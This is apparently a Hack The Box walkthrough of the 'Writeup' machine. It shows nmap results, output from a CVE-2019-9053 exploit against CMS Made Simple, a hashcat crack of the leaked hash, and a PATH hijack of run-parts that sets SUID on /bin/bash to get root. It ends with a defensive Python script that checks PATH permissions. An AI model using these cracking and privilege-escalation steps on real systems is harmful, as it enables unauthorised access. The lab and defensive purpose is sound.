HTB Writeup

Information Gathering

# Nmap 7.98 scan initiated Mon Dec 29 13:52:07 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 4.19 (90%), Linux 5.0 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 5.379 days (since Wed Dec 24 04:47:57 2025)
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 29 13:53:46 2025 -- 1 IP address (1 host up) scanned in 99.57 seconds

Vulnerability Analysis

Visiting the web server, then checking robots.txt and finally browsing to http://writeup.htb/writeup/ shows that the site runs CMS Made Simple - Copyright (C) 2004-2019. All rights reserved. Searching for "CMS Made Simple 2019" turns up CVE-2019-9053.

Exploitation (User Flag)

Running the exploit script yields:

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
-> raykayjay9

ssh jkr@writeup.htb and enter raykayjay9 at the password prompt.

Privilege Escalation (Root Flag)

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

Membership in the staff group means full permissions on /usr/local:

jkr@writeup:~$ ls -ld /usr/local/bin
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin

Run pspy:

# At first I didn't find anything, but when we SSH into the target we can see:
2025/12/31 01:34:45 CMD: UID=0     PID=2265   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2025/12/31 01:34:45 CMD: UID=0     PID=2266   | run-parts --lsbsysinit /etc/update-motd.d

run-parts is resolved through PATH, so a PATH hijack is possible:

jkr@writeup:~$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
jkr@writeup:~$ ls -la /usr/local/bin/run-parts
-rwxr-xr-x 1 jkr staff 33 Dec 31 01:39 /usr/local/bin/run-parts
jkr@writeup:~$ ls -ld /bin/bash
-rwxr-xr-x 1 root root 1099016 May 15  2017 /bin/bash

Now reconnect to the target to trigger our payload:

ssh jkr@writeup.htb
jkr@writeup.htb's password:

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 31 01:34:46 2025 from 10.10.16.3
-bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1099016 May 15  2017 /bin/bash
-bash-4.4$ /bin/bash -p
bash-4.4# id
uid=1000(jkr) gid=1000(jkr) **euid=0(root)** groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
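The root cause above is a root-owned process (the MOTD hook) searching a PATH that contains a directory writable by a non-root group. The following script is an added defender-side check, not part of the writeup or of pspy: it pulls the PATH out of a UID=0 pspy line and flags every entry that a non-root user could write to. The sample pspy line is a constructed copy of the one quoted above, and the mode/owner values used in the comments are read from the writeup's `ls -ld /usr/local/bin` output (drwx-wsr-x root:staff, i.e. mode 02735 with gid 50); the function and variable names are my own.

```python
import os
import re
import stat

# Constructed copy of the pspy line quoted in the writeup, used as sample input.
PSPY_LINE = (
    "2025/12/31 01:34:45 CMD: UID=0     PID=2265   | sh -c /usr/bin/env -i "
    "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin "
    "run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new"
)


def extract_root_path(line):
    """Return the PATH entries of a pspy line that ran as UID=0 and carried an
    explicit PATH= assignment; an empty list otherwise."""
    if not re.search(r"\bUID=0\b", line):
        return []
    m = re.search(r"PATH=(\S+)", line)
    return m.group(1).split(":") if m else []


def entry_risk(mode, uid, gid, trusted_gids=(0,)):
    """Explain why a PATH directory with these stat values could let a non-root
    user plant a binary that root later executes; None means it looks safe.
    For the writeup's /usr/local/bin the inputs are mode 0o42735, uid 0, gid 50."""
    if uid != 0:
        return "owned by uid %d, not root" % uid
    # The sticky bit only stops others from deleting or renaming files, not from
    # creating a new one, so a world-writable directory is a risk either way.
    if mode & stat.S_IWOTH:
        return "world-writable"
    if mode & stat.S_IWGRP and gid not in trusted_gids:
        return "group-writable by gid %d" % gid
    return None


def audit_path(entries, stat_fn=os.stat):
    """Map each existing PATH entry to its risk string (or None).
    stat_fn is injectable so the same logic can run over recorded stat data."""
    findings = {}
    for directory in entries:
        try:
            st = stat_fn(directory)
        except (FileNotFoundError, PermissionError):
            continue
        findings[directory] = entry_risk(st.st_mode, st.st_uid, st.st_gid)
    return findings


if __name__ == "__main__":
    # Audit the PATH that root's MOTD hook used, against the local filesystem.
    for directory, risk in audit_path(extract_root_path(PSPY_LINE)).items():
        print("%-18s %s" % (directory, risk or "ok"))
```

On a host set up like the box, the entry for /usr/local/bin is reported as group-writable by gid 50, which is exactly the precondition the hijack needs; the fix is to keep the staff group empty (or drop /usr/local from PATH in the hook), and to verify that no root job inherits a PATH whose directories fail this check.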

Lessons Learned